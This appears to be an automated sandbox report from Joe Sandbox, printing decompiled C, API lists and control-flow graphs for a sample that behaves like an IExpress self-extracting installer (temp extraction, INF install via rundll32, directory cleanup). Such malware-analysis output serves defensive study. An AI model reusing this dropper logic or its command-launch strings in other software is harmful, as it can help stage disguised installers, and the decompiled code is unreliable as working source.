                                                                                                                                                                                                                                            0x00a91d7f
                                                                                                                                                                                                                                            0x00a91e05
                                                                                                                                                                                                                                            0x00a91e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91e12
                                                                                                                                                                                                                                            0x00a91e1b
                                                                                                                                                                                                                                            0x00a91e73
                                                                                                                                                                                                                                            0x00a91e21
                                                                                                                                                                                                                                            0x00a91e21
                                                                                                                                                                                                                                            0x00a91e28
                                                                                                                                                                                                                                            0x00a91e37
                                                                                                                                                                                                                                            0x00a91e3e
                                                                                                                                                                                                                                            0x00a91e52
                                                                                                                                                                                                                                            0x00a91e60
                                                                                                                                                                                                                                            0x00a91e60
                                                                                                                                                                                                                                            0x00a91e3e
                                                                                                                                                                                                                                            0x00a91e79
                                                                                                                                                                                                                                            0x00a91e7b
                                                                                                                                                                                                                                            0x00a91e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91d9b
                                                                                                                                                                                                                                            0x00a91d9b
                                                                                                                                                                                                                                            0x00a91da0
                                                                                                                                                                                                                                            0x00a91da2
                                                                                                                                                                                                                                            0x00a91da5
                                                                                                                                                                                                                                            0x00a91da5
                                                                                                                                                                                                                                            0x00a91da7
                                                                                                                                                                                                                                            0x00a91da8
                                                                                                                                                                                                                                            0x00a91dac
                                                                                                                                                                                                                                            0x00a91dae
                                                                                                                                                                                                                                            0x00a91db4
                                                                                                                                                                                                                                            0x00a91db7
                                                                                                                                                                                                                                            0x00a91db7
                                                                                                                                                                                                                                            0x00a91db9
                                                                                                                                                                                                                                            0x00a91dba
                                                                                                                                                                                                                                            0x00a91dbe
                                                                                                                                                                                                                                            0x00a91dc3
                                                                                                                                                                                                                                            0x00a91dce
                                                                                                                                                                                                                                            0x00a91dd2
                                                                                                                                                                                                                                            0x00a91deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91dd2
                                                                                                                                                                                                                                            0x00a91bf7
                                                                                                                                                                                                                                            0x00a91bfe
                                                                                                                                                                                                                                            0x00a91c07
                                                                                                                                                                                                                                            0x00a91d55
                                                                                                                                                                                                                                            0x00a91d5a
                                                                                                                                                                                                                                            0x00a91d5b
                                                                                                                                                                                                                                            0x00a91d5d
                                                                                                                                                                                                                                            0x00a91d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91c1b
                                                                                                                                                                                                                                            0x00a91c1b
                                                                                                                                                                                                                                            0x00a91c20
                                                                                                                                                                                                                                            0x00a91c2c
                                                                                                                                                                                                                                            0x00a91c33
                                                                                                                                                                                                                                            0x00a91c38
                                                                                                                                                                                                                                            0x00a91c3a
                                                                                                                                                                                                                                            0x00a91c3a
                                                                                                                                                                                                                                            0x00a91c40
                                                                                                                                                                                                                                            0x00a91c4b
                                                                                                                                                                                                                                            0x00a91c4b
                                                                                                                                                                                                                                            0x00a91c5d
                                                                                                                                                                                                                                            0x00a91c61
                                                                                                                                                                                                                                            0x00a91dd4
                                                                                                                                                                                                                                            0x00a91dd4
                                                                                                                                                                                                                                            0x00a91dd6
                                                                                                                                                                                                                                            0x00a91ddb
                                                                                                                                                                                                                                            0x00a91ddc
                                                                                                                                                                                                                                            0x00a91dde
                                                                                                                                                                                                                                            0x00a91d64
                                                                                                                                                                                                                                            0x00a91d64

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A91BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00A91C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00A91C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A91140,00000000,00000008,?), ref: 00A91CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00A91D1B
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-852641736
                                                                                                                                                                                                                                            • Opcode ID: 44fbb06089f3af50b16ae43ea82537fc6f133f438d7b5f236ac759e95e5b1c55
                                                                                                                                                                                                                                            • Instruction ID: d4cba36836da309a0e1db60ab8d05c45a98a424b864731fc4b1fd5f4c4a35f0c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44fbb06089f3af50b16ae43ea82537fc6f133f438d7b5f236ac759e95e5b1c55
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59A13670B0021A6BEF20DB24CC45BFA77E9EB55310F24079AE555A72D0EFB08E86CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 406 a92f1d-a92f3d 407 a92f6c-a92f73 call a95164 406->407 408 a92f3f-a92f46 406->408 415 a92f79-a92f80 call a955a0 407->415 416 a93041 407->416 410 a92f48 call a951e5 408->410 411 a92f5f-a92f66 call a93a3f 408->411 417 a92f4d-a92f4f 410->417 411->407 411->416 415->416 424 a92f86-a92fbe GetSystemDirectoryA call a9658a LoadLibraryA 415->424 420 a93043-a93053 call a96ce0 416->420 417->416 421 a92f55-a92f5d 417->421 421->407 421->411 428 a92fc0-a92fd4 GetProcAddress 424->428 429 a92ff7-a93004 FreeLibrary 424->429 428->429 430 a92fd6-a92fee DecryptFileA 428->430 431 a93017-a93024 SetCurrentDirectoryA 429->431 432 a93006-a9300c 429->432 430->429 445 a92ff0-a92ff5 430->445 433 a93054-a9305a 431->433 434 a93026-a9303c call a944b9 call a96285 431->434 432->431 435 a9300e call a9621e 432->435 439 a9305c call a93b26 433->439 440 a93065-a9306c 433->440 434->416 441 a93013-a93015 435->441 451 a93061-a93063 439->451 442 a9307c-a93089 440->442 443 a9306e-a93075 call a9256d 440->443 441->416 441->431 448 a9308b-a93091 442->448 449 a930a1-a930a9 442->449 452 a9307a 443->452 445->429 448->449 453 a93093 call a93ba2 448->453 455 a930ab-a930ad 449->455 456 a930b4-a930b7 449->456 451->416 451->440 452->442 459 a93098-a9309a 453->459 455->456 458 a930af call a94169 455->458 456->420 458->456 459->416 461 a9309c 459->461 461->449
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A92F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0xa98a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00A95164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00A96CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E00A955A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E00A9658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0xa9a288("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0xa98a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0xa98a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0xa98d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0xa98d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0xa99a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E00A9256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0xa98a24; // 0x0
                                                                                                                                                                                                                                            									 *0xa99a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0xa98a38;
                                                                                                                                                                                                                                            										if( *0xa98a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E00A94169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0xa99a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E00A93BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0xa98a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E00A93B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E00A944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0xa99a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A9621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0xa98a24;
                                                                                                                                                                                                                                            				if( *0xa98a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E00A93A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A951E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0xa98a38;
                                                                                                                                                                                                                                            				if( *0xa98a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a92fd8
                                                                                                                                                                                                                                            0x00a92fe0
                                                                                                                                                                                                                                            0x00a92fe6
                                                                                                                                                                                                                                            0x00a92fee
                                                                                                                                                                                                                                            0x00a92ff0
                                                                                                                                                                                                                                            0x00a92ff5
                                                                                                                                                                                                                                            0x00a92ff5
                                                                                                                                                                                                                                            0x00a92fee
                                                                                                                                                                                                                                            0x00a92fd4
                                                                                                                                                                                                                                            0x00a92ff8
                                                                                                                                                                                                                                            0x00a92ffe
                                                                                                                                                                                                                                            0x00a93004
                                                                                                                                                                                                                                            0x00a93017
                                                                                                                                                                                                                                            0x00a9301c
                                                                                                                                                                                                                                            0x00a93024
                                                                                                                                                                                                                                            0x00a93054
                                                                                                                                                                                                                                            0x00a9305a
                                                                                                                                                                                                                                            0x00a93065
                                                                                                                                                                                                                                            0x00a93065
                                                                                                                                                                                                                                            0x00a9306c
                                                                                                                                                                                                                                            0x00a9306e
                                                                                                                                                                                                                                            0x00a93075
                                                                                                                                                                                                                                            0x00a9307a
                                                                                                                                                                                                                                            0x00a9307a
                                                                                                                                                                                                                                            0x00a9307c
                                                                                                                                                                                                                                            0x00a93081
                                                                                                                                                                                                                                            0x00a93087
                                                                                                                                                                                                                                            0x00a93089
                                                                                                                                                                                                                                            0x00a930a1
                                                                                                                                                                                                                                            0x00a930a1
                                                                                                                                                                                                                                            0x00a930a9
                                                                                                                                                                                                                                            0x00a930ab
                                                                                                                                                                                                                                            0x00a930ad
                                                                                                                                                                                                                                            0x00a930af
                                                                                                                                                                                                                                            0x00a930af
                                                                                                                                                                                                                                            0x00a930ad
                                                                                                                                                                                                                                            0x00a930b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9308b
                                                                                                                                                                                                                                            0x00a9308b
                                                                                                                                                                                                                                            0x00a93091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93093
                                                                                                                                                                                                                                            0x00a93098
                                                                                                                                                                                                                                            0x00a9309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9309c
                                                                                                                                                                                                                                            0x00a93089
                                                                                                                                                                                                                                            0x00a9305c
                                                                                                                                                                                                                                            0x00a93061
                                                                                                                                                                                                                                            0x00a93063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93063
                                                                                                                                                                                                                                            0x00a9302b
                                                                                                                                                                                                                                            0x00a93032
                                                                                                                                                                                                                                            0x00a9303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9303c
                                                                                                                                                                                                                                            0x00a93006
                                                                                                                                                                                                                                            0x00a9300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9300e
                                                                                                                                                                                                                                            0x00a93015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93015
                                                                                                                                                                                                                                            0x00a92f80
                                                                                                                                                                                                                                            0x00a92f3f
                                                                                                                                                                                                                                            0x00a92f46
                                                                                                                                                                                                                                            0x00a92f5f
                                                                                                                                                                                                                                            0x00a92f5f
                                                                                                                                                                                                                                            0x00a92f64
                                                                                                                                                                                                                                            0x00a92f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92f66
                                                                                                                                                                                                                                            0x00a92f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92f55
                                                                                                                                                                                                                                            0x00a92f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A92F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A92FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A92FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00A92FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00A92FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A9301C
                                                                                                                                                                                                                                              • Part of subcall function 00A951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F4D,?,00000002,00000000), ref: 00A95201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-2099937843
                                                                                                                                                                                                                                            • Opcode ID: c195b1f8b7b15578c936843f44b3b8bb7fb5a8358b7d5d0a9299199f54288032
                                                                                                                                                                                                                                            • Instruction ID: a833c30ea14a48bec16a2f618b59078a450034adc6ff38a11f344684fa0940af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c195b1f8b7b15578c936843f44b3b8bb7fb5a8358b7d5d0a9299199f54288032
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3241A832B00205AADF30EBB99D4976B33F8EB55790F11016BE941C2591EF78CE82CB65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A92390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E00A96CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A91680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E00A916B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E00A91680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E00A916B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E00A916B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E00A9658A( &_v280, 0x104, 0xa91140);
                                                                                                                                                                                                                                            								E00A92390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00A98A3A,00A911F4,00A98A3A,00000000,?,?), ref: 00A923F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A911F8), ref: 00A92427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A911FC), ref: 00A9243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A92495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00A924A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A924AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00A924BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00A98A3A), ref: 00A924C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                                                            • Instruction ID: 651cd56c74a6c6e13e78586ee337725a317d368169a893b838fd471a5e2a8a37
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a68b9ed4b1ed5cec6d133ca370bd651c0782fce033b1966d4d3ae81eb6b1f479
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31316D32704641ABCB21EBA4DD89AEB73ECABC4305F14492FB59586290EF3499498792
